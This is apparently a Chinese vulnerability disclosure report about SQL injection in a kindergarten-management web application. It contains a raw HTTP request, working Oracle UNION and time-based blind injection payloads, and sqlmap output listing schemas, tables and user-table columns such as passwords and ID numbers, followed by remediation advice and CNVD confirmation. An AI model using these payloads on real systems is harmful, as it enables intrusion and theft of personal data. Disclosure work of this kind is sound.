2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开
POST /CKindMessageControl/createCookies.do HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/login.jsp
Content-Length: 36
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

checkCode=123456&checkKindCode=admin
Parameter: checkKindCode
    Type: UNION query
    Title: Generic UNION query (NULL) - 21 columns
    Payload: checkCode=123456&checkKindCode=admin' UNION ALL SELECT CHR(58)||CHR(98)||CHR(105)||CHR(109)||CHR(58)||CHR(67)||CHR(67)||CHR(102)||CHR(114)||CHR(89)||CHR(87)||CHR(109)||CHR(106)||CHR(101)||CHR(66)||CHR(58)||CHR(119)||CHR(101)||CHR(122)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: checkCode=123456&checkKindCode=admin' AND 3836=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(86)||CHR(122)||CHR(114),5) AND 'EEON'='EEON
---
back-end DBMS: Oracle
available databases [16]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XXTY

(注:以上结果表明 checkKindCode 参数的值很可能未经参数化就进入了后端 Oracle 查询;修复方向是改用绑定变量的参数化查询。另外,应用所用的数据库账户能够列出 SYS、SYSTEM 等 16 个 schema,建议同时核查并按最小权限原则收敛该账户的权限。)
Database: XXTY[267 tables]+---------------------------+| APN_DEVICETOKEN || APN_USER || CHARGE_PACKAGE || CLIENT_CLASSRING || CLIENT_COLLECTION || CLIENT_COMMENTS || CLIENT_COMMENTSNEWS || CLIENT_FILETASK || CLIENT_KINDNEWSFILE || CLIENT_KINDNEWSINFO || CLIENT_LIMITMODEL || CLIENT_PRAISE || CLIENT_REPLYCOMMENTS || CLIENT_REPLYNEWSCOMMENTS || CLIENT_REPLYVIDEOCOMMENTS || CLIENT_SPACENEWMESSAGE || CLIENT_TEACHERLOGTEXT || CLIENT_VALIDATEPHONE || CLIENT_VIDEODEVICE || CLIENT_VIDEOSERVER || CLIENT_WATCHHOUSE || CLIENT_WATCHUSER || CLIENT_WATCH_FAMILYUSER || CODE_KINDPROVINCECITY || FAMILY_TRIGGERSLOG || KIND_ADVERTISING || KIND_ADVERTISINGTYPE || KIND_ANDROIDVERSIONS || KIND_ANSWER || KIND_BACKMODULE || KIND_CLOUDKINDUSER || KIND_CLOUNDKINDMESSAGE || KIND_DIARYINFO || KIND_FAMILYLOGTEXT || KIND_FAMILYLOGTEXTFILE || KIND_FAMILYPHOTO || KIND_FAMILYPHOTOTYPE || KIND_FEEDBACK || KIND_FEEDBACKASTATE || KIND_KINDMESSAGE || KIND_LESSONPLAN || KIND_LESSONPLANPHOTO || KIND_LESSONREVIEW || KIND_LINK || KIND_MANAGECLIENTTABLE || KIND_NEWS || KIND_NEWSCOLUMN || KIND_NEWSLOGINUSER || KIND_NEWSREVIEW || KIND_NOPASSMESSAGE || KIND_ONLINEMESSAGE || KIND_OPINION || KIND_PARTITIONDICTIONARY || KIND_PHOTOINFO || KIND_PHOTO_NEWS || KIND_PROFICIENT || KIND_REPLACE || KIND_REPLYOPINION || KIND_TEACHERWORKDATA || KIND_TRIGGERSLOG || KIND_TRIGGERSRESOURCE || KIND_VIDEONEWS || MSG_DEVICETOKEN_ANDROID || MSG_DEVICETOKEN_EASEMOB || MSG_DEVICETOKEN_IOS || MSG_EASEMOBMSGTASK || MSG_LIST_ANDROID || MSG_LIST_IOS || MSG_NOTICE_ANDROID || MSG_NOTICE_IOS || MSG_PNBUSLEAVEMSG || MSG_PNBUSMSG || MSG_PNLIFEHELP || MSG_RECEIVELOG || MSG_SENDSUCCESS_ANDROID || MSG_SEND_ANDROID || MSG_SEND_IOS || MSG_SMSMESSAGEBYEXCEPTION || MSG_SMSMESSAGEBYMANUAL || MSG_SMSMESSAGELOG || MSG_SMSMESSAGETASK || MSG_SMSMODEL || MSG_TEMPLIST_ANDROID || MSG_TEMPLIST_IOS || MYTEST_USER || NEW_PHOTO_STUPHOTOMSG || OA2_USER || QUICK_TABLE || SHIMIAO_USER || SHI_BUYBOOKINFO || SHI_CAPITAL || SYS_ACCESSFILE || SYS_ACCESSORIES || 
SYS_ACCESSORIESATTACHMENT || SYS_ACTIVITYC || SYS_ACTIVITYS || SYS_ATTENDANCE || SYS_ATTENDANCECOUNT || SYS_ATTENDANCEFILES || SYS_ATTENDANCELOG || SYS_ATTENDANCENEWS || SYS_ATTENDANCESTUSAVE || SYS_ATTENDANCEVIDEO || SYS_AUTOGRAPHINFO || SYS_CARDLOG || SYS_CHECKINFO || SYS_CLASS || SYS_CLASSEXAMINE || SYS_CLASSPHOTO || SYS_CLASSTABLEHISTORY || SYS_COMMENTS || SYS_CONFIG || SYS_CONFIG_COOKBOOK || SYS_CONFIG_DICTIONARYITEM || SYS_CONFIG_QUESTIONDIC || SYS_CONFIG_WEEKLYPLAN || SYS_COOKBOOK || SYS_COOKBOOKCONFIG || SYS_COOKBOOKEXPORT || SYS_COOKFILE || SYS_COOKINPICTURE || SYS_COOKMENU || SYS_COOKMSGBYDAY || SYS_COURSEWARE || SYS_DICTIONARY || SYS_DICTIONARYITEM || SYS_ERRORLOGIOS || SYS_EXAMINECOMMENT || SYS_FILE || SYS_FILELOG || SYS_HARDWARECFG || SYS_HOMEVISIT || SYS_HOMEVISITFILE || SYS_HOMEVISITMODE || SYS_INFORMATIONBANK || SYS_INFORMATIONBANKFILE || SYS_KINDACTIVITY || SYS_KINDBUS || SYS_KINDFILE || SYS_KINDMESSAGE || SYS_KINDMODULECHECKINFO || SYS_KINDVIDEO || SYS_KINDVIDEOCOMMENTS || SYS_KINDVIDEOFOREVER || SYS_KINDWECHAT || SYS_KINDWORKUPLOAD || SYS_KINDWORKUPLOADLOG || SYS_KINDWX || SYS_KMSINFOLOG || SYS_KMSLOG || SYS_KNOWLEDGEBASE || SYS_LEARNCOMMENT || SYS_LOGANDROID || SYS_MOBILEMODELOPT || SYS_MOBILEMODELOPTION || SYS_MODULE || SYS_MODULECHECKINFO || SYS_MODULEFUNCTION || SYS_MODULEKINDCHECKINFO || SYS_MODULERIGHT || SYS_NIGHTSTORY || SYS_PARENTALADV || SYS_PARENTALADVPHOTO || SYS_PHOTOCOMMENTS || SYS_PHOTOCOMPLETE || SYS_PHOTOTASK || SYS_PHOTO_STUACTIVITY || SYS_PHOTO_STUPHOTOMSG || SYS_PNMESSAGEFAILURE || SYS_PNMESSAGEFILE || SYS_PNMESSAGEINFO || SYS_PNMESSAGELOG || SYS_PNSENDMESSAGE || SYS_PNSENDMESSAGEOLD || SYS_PNSENDMESSAGETEMP || SYS_PNSENDMSG || SYS_PN_MESSAGEWORK || SYS_PN_MESSAGEWORKLOG || SYS_POSTMANAGE || SYS_PUNCH_MACHINE || SYS_QUESTIONNAIREINFO || SYS_QUESTIONNAIREMESSAGE || SYS_QUESTIONNAIRES || SYS_ROLE || SYS_RULESSYSTEM || SYS_STUACTIVITY || SYS_STUDENT || SYS_STUDENTACTIVITY || SYS_STUDENTBILLS || SYS_STUDENTCARDS || 
SYS_STUDENTEASEMOB || SYS_STUDENTEMP || SYS_STUDENTEXAMINE || SYS_STUDENTFAMILY || SYS_STUDENTHOLIDAY || SYS_STUDENTLEARNING || SYS_STUDENTLEAVE || SYS_STUDENTLOG || SYS_STUDENTPHYSICAL || SYS_STUDENTREGEASEMOBLOG || SYS_STUDENTSET || SYS_STUMORNEXAMINE || SYS_STUMORNEXAMINE_S || SYS_STUMORNEXAMINE_TEMP || SYS_STUNIGHTEXAMINE || SYS_SYSEMAILURL || SYS_SYSUSERLOG || SYS_TABLESALIASE || SYS_TEACHERARCHIVES || SYS_TEACHERARCHIVESFILE || SYS_TEACHEREXAMINE || SYS_TEACHERTRANSACTION || SYS_TEADAYEXAMINE || SYS_TEAHERARCHIVESMODE || SYS_TEAMONTHEXAMINE || SYS_TEATALKFILE || SYS_TEATALKTEXT || SYS_TEAWORK || SYS_TEMPORARYFILE || SYS_UPLOADFILE || SYS_UPLOADFILECOMPLETE || SYS_USER || SYS_USERCONFIG || SYS_USERINFOACCESSORY || SYS_VACATIONSTUDENT || SYS_VPFILEUPLOAD || SYS_VPOPTION || SYS_WECHATLEVELS || SYS_WEEKINFOWORK || SYS_WEEKLYINPICTURE || SYS_WEEKLYPLAN || SYS_WEEKLYPLANEXPORT || SYS_WEEKLYPLANREMARK || SYS_WEEKSPLAN || SYS_WXLOGIN || SYS_WXPHOTO || TEMP_STULEAVE || WEB_EMPLOYEE || WEB_KINDBASICINFO || WEB_KINDCLASS || WEB_KINDFOCUSPHOTO || WEB_KINDFRUIT || WEB_KINDGROUPPHOTO || WEB_KINDINTRODUCE || WEB_KINDMESSAGE || WEB_KINDNETPHOTO || WEB_KINDNEWS || WEB_KINDNEWSPHOTO || WEB_KINDRECRUITMENT || WEB_KINDTEACHER || WEB_KINDTEACHERMIEN || WEB_KINDUSER || WEB_KIND_FEEDBACK || WEB_KIND_LINKUS || WEB_KIND_MODULE || WEB_KIND_NEWS || WEB_KIND_NEWSFILE || WEB_KIND_OPINION || WEB_KIND_USER || WEB_PHOTO || WEB_PHOTOALBUM || WEB_REGINFO || WEB_TEXTBOOK || WEB_TEXTBOOKTYPE || WX_BACKUSER || WX_MESSAGEINFO || WX_MESSAGELOG |+-------------------Database: XXTYTable: SYS_USER[24 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| ACCOUNTADDRESS | VARCHAR2 || ADDRESS | VARCHAR2 || BIRTHDAY | VARCHAR2 || CLIENTLOGINDATE | DATE || DESCRIPTION | VARCHAR2 || ENDONLINEDATE | DATE || ETHNIC | VARCHAR2 || FIXEDPHONE | VARCHAR2 || GENDER | VARCHAR2 || IDNUMBER | VARCHAR2 || ISREGEASEMOB | NUMBER || KINDID | VARCHAR2 || LOGINUSER | VARCHAR2 || MOBILEPHONE 
| VARCHAR2 || PARTITIONCODE | VARCHAR2 || PHOTOHEADURL | VARCHAR2 || POSTID | VARCHAR2 || PWD | VARCHAR2 || RFID | VARCHAR2 || ROLEID | NUMBER || STATUSFLAG | VARCHAR2 || USERID | VARCHAR2 || USERNAME | VARCHAR2 || USERNAMEAUDIO | VARCHAR2 |+-----------------+----------+--------+
危害等级:高
漏洞Rank:10
确认时间:2015-12-08 13:03
CNVD确认并复现所述情况,已经转由CNCERT向中国联合网络通信集团有限公司通报,由其后续协调网站管理部门处置.
暂无